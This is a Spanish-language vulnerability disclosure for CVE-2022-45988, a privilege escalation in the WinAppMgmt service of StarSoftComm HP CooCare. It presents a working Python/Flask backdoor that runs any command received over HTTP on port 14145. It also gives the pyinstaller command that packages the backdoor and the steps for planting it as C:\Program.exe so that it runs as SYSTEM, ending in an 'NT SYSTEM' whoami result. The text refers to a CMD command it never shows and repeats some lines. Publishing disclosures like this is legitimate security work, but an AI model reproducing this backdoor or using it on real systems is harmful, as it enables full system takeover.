
CVE-2022-45988 StarSoftComm HP CooCare Existe una vulnerabilidad de elevación de privilegios
####################################################
He contactado con hp-security-alert. Han corregido este error. Acerca de StarSoftComm CooCare [HP-PSRT-IR #4106]
El proveedor respondió con la siguiente información:
Siga estos pasos para actualizar:
#####################################
Existe una vulnerabilidad de elevación de privilegios en StarSoftComm HP CooCare que podría permitir a un atacante elevar su nivel de privilegios. e管家超级版 es un software de diagnóstico remoto incluido con HP Star 14 pro, un producto de StarSoftComm (Softway Technology).
Probado en Windows 11 22621.819 HP LAPTOP HP Pavilion Plus 14 pulgadas 14-eh0000 (56D77AV)
Versión afectada: CooCare anterior a v5.364
(use el comando CMD anterior para encontrar el servicio no referenciado)

El nombre del servicio es Windows Application Management Service, también conocido como WinAppMgmt.
El nombre del servicio es Windows Application Management Service, abreviado como WinAppMgmt.

El servicio es de StarSoftComm CooCare.


from flask import Flask, request
import os
app = Flask(__name__)
@app.route('/')
def hello_world():
r = request.args.getlist('cmd') #Reception? cmd= parameter
a=os.popen(r[0]) #Execute system commands
l = a.read()
return l #return
if __name__ == '__main__':
app.run(host='0.0.0.0', port=14145, debug=True) #Listen HTTP port 14145
Usé Python3 y Flask para escribir un ejecutable malicioso. Puede escuchar el puerto HTTP 14145 y ejecutar comandos del sistema.
Usando el comando pyinstaller.exe --onefile --windowed -F -w python_test.py para crear un ejecutable malicioso.

Si el servicio Windows Application Management Service ya está iniciado, puede reiniciarlo.

C:\Program.exe se ejecuta como SYSTEM
Cuando veo que Windows Application Management Service se inicia en Taskmgr.exe como SYSTEM, entonces puedo abrir el navegador e ingresar http://127.0.0.1:14145?cmd=whoami
Esperar..........
por...
ello.
NT SYSTEM
